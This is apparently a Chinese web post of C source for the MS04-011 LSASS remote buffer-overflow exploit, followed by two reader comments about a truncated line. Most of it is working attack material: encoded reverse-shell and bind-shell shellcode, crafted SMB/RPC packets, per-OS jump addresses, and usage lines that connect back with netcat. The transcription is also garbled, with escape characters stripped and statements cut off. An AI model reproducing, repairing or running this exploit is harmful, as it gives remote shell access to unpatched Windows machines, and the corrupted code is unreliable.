LSASS溢出原代码(可直接编译版本)

#include
#include
#pragma comment(lib, "ws2_32")
// reverse shellcode
unsigned char reverseshell[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99"
"x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12"
"x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99"
"x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9"
"xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D"
"x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA"
"xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32"
"x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10"
"xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8"
"xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66"
"xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5"
"x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8"
"x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A"
"x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12"
"x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A"
"x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C"
"x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33"
"xF9x7ExE0x5FxE0";
// bind shellcode
unsigned char bindshell[] =
"xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";

char req1[] =
"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"
"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"
"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"
"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"
"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"
"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"
"x20x4Cx4Dx20x30x2Ex31x32x00";
char req2[] =
"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"
"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"
"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"
"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"
"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"
"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"
"x2Ex00x30x00x00x00x00x00";

char req3[] =
"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"
"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"
"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"
"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"
"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"
"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"
"x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF"
"x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00"
"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"
"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"
"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"
"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";

char req4[] =
"x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00"
"x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00"
"x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00"
"x49x00x50x00x43x00x24"
"x00x00x00x3Fx3Fx3Fx3Fx3Fx00";
char req5[] =
"x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00"
"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00"
"x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00"
"x72x00x70x00x63x00x00x00";
char req6[] =
"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
"x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00"
"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
"x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11"
"x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A"
"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";
char req7[] =
"x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02"
"x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00"
"xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00"
"xECx03x00x00x00x00x00x00xECx03x00x00";
// room for shellcode here ...
char shit1[] =
"x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9";
char req8[] =
"x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE"
"x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF"
"xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00"
"x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00"
"x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00"
"x00x00x00x00xADx0Dx00x00";
// room for shellcode here ...
char req9[] =
"x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01"
"x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02"
"x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00"
"x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00";

char shit3[] =
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00";

#define LEN 3500
#define BUFSIZE 2000
#define NOP 0x90
/*
 * Table of per-target parameters, selected by the numeric id given as
 * argv[1] in main(): the id, a display name printed by usage(), and the
 * address main() uses for that build (the trailing comments record which
 * instruction each address was chosen for).
 *
 * The list is terminated by a { NULL } row. NULL is a pointer constant
 * being used to initialise the int member `num`; it works only because
 * NULL expands to 0 and may draw a warning under -Wint-conversion. Note
 * that usage() does not look for this sentinel: it iterates a hard-coded
 * 3 rows, so the two must be kept in sync by hand when rows are added.
 */
struct targets {
int num;
char name[50];
long jmpaddr;
} ttarget[]= {
{ 0, "WinXP Professional [universal] lsass.exe ", 0x01004600 }, // jmp esp addr
{ 1, "Win2k Professional [universal] netrap.dll", 0x7515123c }, // jmp ebx addr
{ 2, "Win2k Advanced Server [SP4] netrap.dll", 0x751c123c }, // jmp ebx addr
//{ 3, "reboot", 0xffffffff }, // crash
{ NULL }
};
/*
 * Print the banner, the hard-coded target table and invocation examples
 * to stdout, then terminate the process via exit(0).
 *
 * prog: argv[0], echoed into the "Usage:" line.
 *
 * Never returns. The loop bound 3 is a literal that mirrors the number of
 * populated rows in ttarget[] rather than being derived from the table.
 * NOTE(review): the printf format strings and the ttarget element
 * accesses are reproduced here exactly as the page renders them; the
 * transcription has visibly lost characters, so this text is not taken as
 * authoritative for what the original source contained.
 */
void usage(char *prog)
{
int i;
printf("MS04-011 LSASRV.DLL Remote Exploitn");
printf("Compiled by HBU-LK007 (LK007@163.com)n");
printf("Usage:nn");
printf("%s [connectback IP] [options]nn", prog);
printf("Targets:n");
/* one line per populated ttarget[] row; bound kept in sync by hand */
for (i=0; i<3; i++)
printf(" %d [0x%.8x]: %sn", ttarget.num, ttarget.jmpaddr, ttarget.name);
printf("nOptions:n");
printf(" -t: Detect remote OS:n");
printf(" Windows 5.1 - WinXPn");
printf(" Windows 5.0 - Win2knn");
printf("Example:n");
printf("LSASS 0 192.168.1.10 4444 -tn");
printf("LSASS 0 192.168.1.10 4444n");
printf("nc 192.168.1.10 4444n");
/* process ends here; callers never regain control */
exit(0);
}

int main(int argc, char *argv[])
{
int i;
int opt = 0;
char *target;
char hostipc[40];
char hostipc2[40*2];
unsigned short port;
unsigned long ip;
unsigned char *sc;
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(req4)+20];
char screq[BUFSIZE+sizeof(req7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="x66x81xECx1Cx07xFFxE4";
char strBuffer[BUFSIZE];
unsigned int targetnum = 0;
int len, sockfd;
short dport = 445;
struct hostent *he;
struct sockaddr_in their_addr;
char smblen;
char unclen;
WSADATA wsa;

printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n");
printf("--- Coded by .::[ houseofdabus ]::. ---nn");

if (argc 4)
if (!memcmp(argv[4], "-t", 2)) opt = 1;
if ( (argc > 4) && !opt ) {
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;
memcpy(&reverseshell[118], &port, 2);
memcpy(&reverseshell[111], &ip, 4);
sc = reverseshell;
} else {
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
sc = bindshell;
}

if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "x3cx12x15x75", 4);
memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);
memcpy(&buf[2036], sc, strlen(sc));
memcpy(&buf[2840], "xebx06xebx06", 4);
memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addr
memcpy(&buf[2856], sc, strlen(sc));
for (i=0; ih_addr);
memset(&(their_addr.sin_zero), '


  1. 你这个代码有一行少了点东西哦,能不能给个全的阿

  2. for (i=0; i
    sendbuf[i*2] = buf;
    sendbuf[i*2+1] = 0;
    }

    就这个地方,好像循环的条件没有写全哦
